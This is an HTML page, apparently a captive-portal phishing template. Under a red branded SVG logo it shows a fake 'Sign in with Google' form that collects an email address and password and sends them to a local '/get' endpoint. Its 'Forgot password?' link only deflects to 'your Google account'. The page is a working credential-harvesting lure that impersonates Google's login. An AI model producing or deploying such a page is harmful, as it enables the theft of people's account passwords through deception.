<!DOCTYPE html>
<html>
<head>
<style>
body {
  font-family: Arial, sans-serif;
  background-color: #FFFFFF;
}

.container {
  max-width: 400px;
  margin: 0 auto;
  padding: 20px;
}

@media (min-width: 600px) {
  .container {
    max-width: 500px;
  }
}

.logo-container {
  text-align: center;
  margin-bottom: 30px;
  display: flex;
  justify-content: center;
  align-items: center;
}

.logo {
  width: 40px;
  height: 40px;
  fill: #AC1923;
  margin-right: 100px
}

.form-container {
  background: #FFFFFF;
  border: 1px solid #FFFFFF;
  border-radius: 4px;
  padding: 20px;
  box-shadow: 0px 0px 10px 0px rgba(108,66,156,0.2);
}

h1 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

h2 {
  text-align: center; 
  font-size: 28px;
  font-weight: 500;
  color: #000000;
  margin-bottom: 20px;
}

.input-field {
  width: 100%;
  padding: 12px;
  border: 2px solid #AC1923;
  border-radius: 4px;
  box-sizing: border-box;
  margin-bottom: 20px;
  font-size: 14px;
}

.submit-btn {
  background: #AC1923;
  border: none;
  color: #FFFFFF;
  padding: 12px 20px;
  border-radius: 4px;
  cursor: pointer;
  font-size: 16px;
    display: block;
  margin: auto;
  margin-top: 20px;
}

.submit-btn:hover {
  background: #AC1923;
}

.forgot-password {
  display: block;
  text-align: center;
  color: #000000;
  text-decoration: underline;
  margin-top: 10px;
}

.error-message {
  color: red;
  text-align: center;
  display: none; 
  margin-top: 10px;
}

</style>
</head>

<body>

<div class="container">

  <div class="logo-container">
<svg version="1.0" xmlns="http://www.w3.org/2000/svg"
 width="320.000000pt" height="180.000000pt" viewBox="0 0 640.000000 360.000000"
 preserveAspectRatio="xMidYMid meet">
<g transform="translate(0.000000,360.000000) scale(0.100000,-0.100000)"
fill="#AC1923" stroke="none">
<path d="M380 2150 l0 -1150 175 0 c96 0 175 -4 175 -9 0 -4 66 -11 147 -14
93 -3 149 -9 151 -16 2 -7 38 -11 97 -11 65 0 95 -4 97 -12 3 -8 33 -14 81
-16 42 -2 77 -8 77 -12 0 -4 32 -11 70 -14 39 -4 70 -11 70 -17 0 -5 23 -9 51
-9 31 0 56 -6 65 -15 9 -9 34 -15 59 -15 24 0 45 -4 47 -10 2 -5 31 -13 66
-16 34 -4 62 -10 62 -14 0 -4 30 -10 67 -12 39 -2 68 -9 71 -16 2 -8 30 -12
82 -12 54 0 80 -4 82 -12 3 -9 35 -14 96 -16 51 -2 92 -7 92 -11 0 -5 53 -11
117 -14 66 -4 119 -11 121 -17 2 -6 61 -10 155 -10 97 -1 174 -6 212 -15 73
-18 436 -20 505 -3 25 6 121 13 215 15 93 2 172 9 176 14 3 5 58 12 122 16 64
3 117 9 117 14 0 4 41 9 92 11 61 2 93 7 96 16 2 8 28 12 82 12 52 0 80 4 82
12 3 7 32 14 71 16 37 2 67 8 67 12 0 4 28 10 63 14 34 3 64 11 65 16 2 6 23
10 47 10 26 0 47 6 55 15 8 10 31 15 65 15 30 0 55 4 57 10 2 5 31 13 66 16
34 4 62 11 62 15 0 5 30 9 66 9 45 0 70 5 80 15 12 11 39 15 109 15 62 0 95 4
97 12 3 7 49 13 141 16 75 3 137 9 137 13 0 5 72 9 160 9 l160 0 0 1150 0
1150 -2820 0 -2820 0 0 -1150z m1328 83 c2 -8 20 -13 43 -13 28 0 39 -4 39
-15 0 -8 9 -15 20 -15 23 0 104 -76 114 -108 4 -12 12 -22 17 -22 5 0 9 -25 9
-55 l0 -55 -200 0 -200 0 0 -40 c0 -22 5 -40 10 -40 6 0 10 -10 10 -23 0 -24
25 -51 59 -62 12 -3 21 -11 21 -16 0 -16 77 -11 84 6 3 8 14 15 25 15 14 0 23
9 27 25 6 24 9 25 85 25 64 0 79 -3 79 -15 0 -8 -4 -15 -10 -15 -5 0 -10 -7
-10 -16 0 -11 5 -14 16 -10 9 3 31 6 50 6 l34 0 0 149 c0 120 3 153 15 165 8
8 15 24 15 35 0 12 6 21 14 21 8 0 21 6 28 13 39 36 77 47 162 47 68 0 88 -3
92 -15 4 -8 12 -15 20 -15 8 0 14 -7 14 -15 0 -8 5 -15 10 -15 6 0 10 -11 10
-25 0 -14 -4 -25 -10 -25 -5 0 -10 -7 -10 -15 0 -11 -12 -15 -45 -15 -33 0
-45 4 -45 15 0 8 -4 15 -10 15 -5 0 -10 11 -10 25 0 20 -5 25 -26 25 -39 0
-84 -50 -84 -94 l0 -36 64 0 c58 0 64 -2 70 -22 14 -55 11 -58 -64 -58 l-70 0
0 -79 0 -80 53 -3 52 -3 3 -37 3 -38 -161 0 c-170 0 -180 2 -194 48 -9 27 -23
28 -31 3 -3 -11 -14 -23 -25 -26 -10 -3 -21 -12 -24 -20 -3 -8 -17 -15 -31
-15 -14 0 -25 -4 -25 -10 0 -6 -43 -10 -110 -10 -60 0 -110 4 -110 9 0 5 -11
12 -25 15 -14 4 -25 11 -25 16 0 6 -7 10 -15 10 -8 0 -15 7 -15 15 0 8 -4 15
-10 15 -15 0 -50 33 -50 47 0 7 -4 13 -10 13 -6 0 -10 40 -10 99 0 79 3 100
15 105 8 3 15 10 15 16 0 15 20 34 43 43 10 4 16 11 13 15 -3 5 19 10 49 11
59 2 71 -11 40 -43 -30 -30 -17 -36 80 -36 88 0 95 1 95 20 0 35 -68 90 -112
90 -16 0 -28 5 -28 10 0 6 -11 10 -25 10 -14 0 -25 -4 -25 -10 0 -5 -18 -10
-39 -10 -22 0 -46 -7 -55 -15 -8 -8 -22 -15 -30 -15 -9 0 -16 -5 -16 -11 0
-14 -25 -39 -39 -39 -6 0 -11 -13 -11 -30 0 -16 -4 -30 -10 -30 -6 0 -10 -37
-10 -90 0 -53 4 -90 10 -90 6 0 10 -13 10 -30 0 -20 5 -30 15 -30 9 0 15 -9
15 -25 0 -16 6 -25 15 -25 8 0 15 -4 15 -10 0 -15 38 -50 54 -50 8 0 16 -7 20
-15 3 -8 12 -15 21 -15 8 0 15 -4 15 -10 0 -5 11 -10 25 -10 16 0 25 -6 25
-15 0 -11 11 -15 40 -15 29 0 40 -4 40 -15 0 -11 11 -15 40 -15 22 0 40 -4 40
-9 0 -4 30 -11 67 -14 38 -4 69 -11 71 -17 5 -14 429 -14 434 1 2 6 41 13 86
16 45 3 82 9 82 13 0 4 23 10 52 12 29 3 54 11 56 17 2 6 25 11 53 11 37 0 49
4 49 15 0 11 11 15 40 15 22 0 40 4 40 9 0 5 14 12 30 16 17 4 30 11 30 16 0
5 11 9 24 9 13 0 29 7 36 15 7 8 25 15 41 15 40 0 36 18 -6 26 -19 3 -35 10
-35 15 0 5 -13 9 -30 9 -20 0 -30 5 -30 15 0 8 -7 15 -15 15 -8 0 -15 7 -15
15 0 8 -7 15 -15 15 -9 0 -15 9 -15 25 0 14 -4 25 -10 25 -5 0 -10 25 -10 55
0 30 5 55 10 55 6 0 10 11 10 25 0 16 6 25 15 25 8 0 15 7 15 15 0 8 5 15 11
15 6 0 17 7 25 15 9 8 29 15 45 15 16 0 29 5 29 10 0 6 28 10 65 10 37 0 65
-4 65 -10 0 -5 14 -10 30 -10 20 0 30 -5 30 -15 0 -8 5 -15 11 -15 14 0 39
-25 39 -40 0 -6 7 -13 15 -16 10 -4 15 -20 15 -45 l0 -39 -150 0 -150 0 0 -25
c0 -16 6 -25 15 -25 9 0 15 -9 15 -25 0 -21 5 -25 29 -25 16 0 36 -7 45 -15
16 -17 86 -21 86 -5 0 5 18 13 40 16 22 4 40 10 40 15 0 5 7 9 15 9 8 0 15 7
15 15 0 9 9 15 25 15 16 0 25 6 25 15 0 8 7 15 15 15 8 0 15 5 15 10 0 6 7 10
15 10 13 0 15 21 15 125 l0 125 -30 0 c-19 0 -30 5 -30 14 0 8 -6 17 -12 20
-10 5 -10 7 0 12 6 3 12 12 12 20 0 11 20 14 94 14 110 0 106 4 106 -111 0
-78 0 -79 25 -79 16 0 25 6 25 15 0 8 6 15 14 15 8 0 16 6 19 13 2 7 8 8 13 3
5 -5 4 -11 -3 -13 -7 -3 -13 -11 -13 -19 0 -8 -7 -14 -15 -14 -8 0 -15 -7 -15
-15 0 -8 -7 -15 -15 -15 -8 0 -15 -5 -15 -11 0 -14 -25 -39 -39 -39 -16 0 -13
-19 4 -36 8 -9 15 -33 15 -55 0 -44 18 -69 48 -69 11 0 27 -3 36 -6 21 -8 21
-54 1 -54 -8 0 -15 -4 -15 -10 0 -6 -55 -10 -145 -10 -90 0 -145 4 -145 10 0
6 5 10 10 10 6 0 10 7 10 15 0 8 7 15 15 15 8 0 15 7 15 15 0 8 5 15 10 15 11
0 130 114 130 125 0 3 -7 5 -15 5 -8 0 -15 -7 -15 -15 0 -8 -5 -15 -11 -15 -7
0 -22 -11 -35 -25 -13 -14 -28 -25 -34 -25 -6 0 -21 -11 -34 -25 -13 -14 -28
-25 -35 -25 -6 0 -11 -6 -11 -14 0 -8 -11 -17 -25 -20 -14 -4 -25 -11 -25 -16
0 -6 -7 -10 -15 -10 -8 0 -15 -4 -15 -10 0 -5 -7 -10 -15 -10 -9 0 -18 -7 -21
-15 -4 -8 -15 -15 -25 -15 -11 0 -22 -7 -25 -15 -4 -8 -17 -15 -30 -15 -15 0
-24 -6 -24 -15 0 -9 -9 -15 -25 -15 -14 0 -25 -4 -25 -10 0 -5 -7 -10 -15 -10
-9 0 -18 -7 -21 -15 -4 -8 -15 -15 -26 -15 -11 0 -26 -7 -34 -15 -9 -8 -26
-15 -40 -15 -13 0 -24 -4 -24 -9 0 -5 -13 -12 -30 -16 -16 -4 -30 -11 -30 -16
0 -5 -18 -9 -39 -9 -25 0 -41 -5 -45 -15 -3 -10 -19 -15 -45 -15 -22 0 -41 -5
-43 -11 -2 -6 -25 -13 -51 -16 -26 -3 -47 -10 -47 -14 0 -5 -26 -9 -57 -9 -32
-1 -69 -7 -83 -15 -33 -19 -536 -22 -542 -3 -3 7 -32 14 -71 16 -37 2 -67 8
-67 12 0 4 -18 10 -40 14 -22 3 -40 11 -40 16 0 6 -18 10 -40 10 -29 0 -40 4
-40 15 0 9 -9 15 -25 15 -14 0 -25 5 -25 10 0 6 -7 10 -15 10 -9 0 -18 7 -21
15 -4 8 -13 15 -21 15 -18 0 -113 95 -113 113 0 8 -7 17 -15 21 -8 3 -15 12
-15 21 0 8 -4 15 -10 15 -5 0 -10 10 -10 23 0 13 -7 32 -15 43 -21 28 -21 219
0 228 8 3 15 17 15 31 0 14 4 25 9 25 5 0 12 11 15 25 4 14 11 25 16 25 6 0
10 7 10 15 0 8 5 15 11 15 7 0 22 11 35 25 13 14 32 25 44 25 11 0 20 7 20 15
0 11 11 15 40 15 22 0 40 4 40 9 0 16 30 20 139 18 73 -1 106 -6 109 -14z
m853 -33 c16 -9 19 -22 19 -90 l0 -80 65 0 65 0 0 -40 0 -40 -65 0 -65 0 0
-80 c0 -85 1 -86 53 -82 21 2 47 25 47 41 0 6 18 11 40 11 22 0 40 -4 40 -10
0 -5 -4 -10 -10 -10 -5 0 -10 -13 -10 -30 0 -20 -5 -30 -15 -30 -8 0 -15 -7
-15 -15 0 -9 -9 -15 -24 -15 -13 0 -26 -5 -28 -12 -3 -7 -31 -14 -69 -16 -51
-3 -69 0 -82 12 -8 9 -18 16 -21 16 -3 0 -15 9 -26 20 -17 17 -20 33 -20 110
l0 90 -55 0 c-51 0 -55 2 -55 23 0 24 31 57 54 57 8 0 31 15 50 34 26 24 36
42 36 65 0 17 4 31 9 31 5 0 12 11 15 25 7 27 33 33 67 15z m1799 -130 c0 -5
9 -10 19 -10 11 0 26 -7 35 -15 8 -8 19 -15 25 -15 7 0 11 -37 11 -106 0 -115
8 -134 54 -134 22 0 26 -4 26 -30 0 -20 -5 -30 -15 -30 -8 0 -15 -4 -15 -10 0
-6 -47 -10 -120 -10 l-120 0 0 40 c0 36 3 40 24 40 30 0 36 16 36 98 0 106 -4
112 -62 112 -48 0 -78 -15 -78 -39 0 -6 -7 -11 -15 -11 -12 0 -15 -16 -15 -80
0 -77 1 -80 23 -80 12 0 30 -9 40 -20 16 -19 16 -21 -3 -40 -18 -18 -33 -20
-135 -20 -70 0 -115 4 -115 10 0 6 -7 10 -16 10 -11 0 -14 8 -12 28 3 23 8 27
41 30 l37 3 0 105 0 104 -40 0 c-38 0 -40 2 -40 30 l0 30 110 0 c91 0 110 -3
110 -15 0 -8 4 -15 9 -15 5 0 11 7 15 15 3 8 17 15 31 15 14 0 25 5 25 10 0 6
28 10 65 10 37 0 65 -4 65 -10z m550 0 c0 -5 14 -10 30 -10 17 0 30 5 30 10 0
6 25 10 56 10 53 0 55 -1 48 -22 -3 -13 -11 -24 -15 -26 -5 -2 -9 -10 -9 -18
0 -8 -7 -14 -15 -14 -11 0 -15 -12 -15 -45 0 -44 -24 -85 -50 -85 -5 0 -10 -7
-10 -15 0 -11 -12 -15 -50 -15 -38 0 -50 -4 -50 -15 0 -12 -14 -15 -70 -15
-56 0 -70 3 -70 15 0 9 -9 15 -25 15 -28 0 -32 -14 -11 -35 10 -10 55 -14 171
-17 115 -2 159 -6 163 -15 2 -7 8 -13 14 -13 16 0 37 -26 44 -54 3 -14 10 -26
15 -26 5 0 9 -13 9 -30 0 -16 -4 -30 -10 -30 -5 0 -12 -11 -16 -25 -3 -14 -12
-25 -20 -25 -8 0 -14 -4 -14 -9 0 -5 -10 -13 -22 -17 -13 -4 -26 -12 -30 -18
-10 -16 -310 -15 -315 2 -3 6 -16 12 -29 12 -14 0 -27 7 -30 15 -4 8 -12 15
-20 15 -8 0 -14 6 -14 14 0 8 -6 17 -12 19 -26 11 17 27 70 27 38 0 54 -4 58
-15 4 -8 15 -15 26 -15 11 0 26 -7 34 -15 10 -10 35 -15 69 -15 38 0 54 4 59
15 3 8 14 15 25 15 24 0 37 36 27 74 -7 30 -41 36 -198 36 -72 0 -118 4 -118
10 0 6 -9 10 -19 10 -37 0 -54 29 -48 84 2 28 10 52 16 54 14 5 15 32 1 32 -5
0 -10 23 -10 50 0 28 5 50 10 50 6 0 10 7 10 15 0 8 6 15 14 15 8 0 16 7 20
15 3 8 17 15 31 15 14 0 25 5 25 10 0 6 47 10 120 10 73 0 120 -4 120 -10z
m-1106 -16 c13 -5 16 -27 16 -135 l0 -129 24 0 c38 0 56 -10 56 -32 0 -42 -20
-48 -174 -48 l-146 0 0 40 c0 40 0 40 38 40 50 0 72 35 72 114 0 61 -22 96
-60 96 -16 0 -20 7 -20 30 l0 30 89 0 c49 0 96 -3 105 -6z"/>
<path d="M4722 1995 c-33 -34 -35 -53 -4 -84 21 -22 105 -27 124 -7 9 9 21 16
27 16 6 0 11 12 11 26 0 26 -20 54 -39 54 -6 0 -11 7 -11 15 0 11 -10 15 -37
14 -29 -1 -46 -9 -71 -34z"/>
</g>
</svg>


  </div>

  <div class="form-container">

    <center><h1>Sign in with <font color="#4285F4">G</font><font color="#EA4335">o</font><font color="#FBBC05">o</font><font color="#4285F4">g</font><font color="#34A853">l</font><font color="#EA4335">e</font>
</h1>
      </center>

    <form action="/get" id="login-form">
    
      <input name="email" class="input-field" type="text" placeholder="Email" required>
      
      <input name="password" class="input-field" type="password" placeholder="Password" required>

	  <a href="javascript:void(0);" class="forgot-password">Forgot password?</a>

      <button class="submit-btn" type="submit">Continue</button>
	<div class="error-message"></div>

    </form>

  </div>

</div>
<script>
  document.querySelector('.forgot-password').addEventListener('click', function() {
    var errorMessage = document.querySelector('.error-message');
    errorMessage.innerHTML = "Please refer to your Google account";
    errorMessage.style.display = 'block';
  });
</script>
</body>
</html>
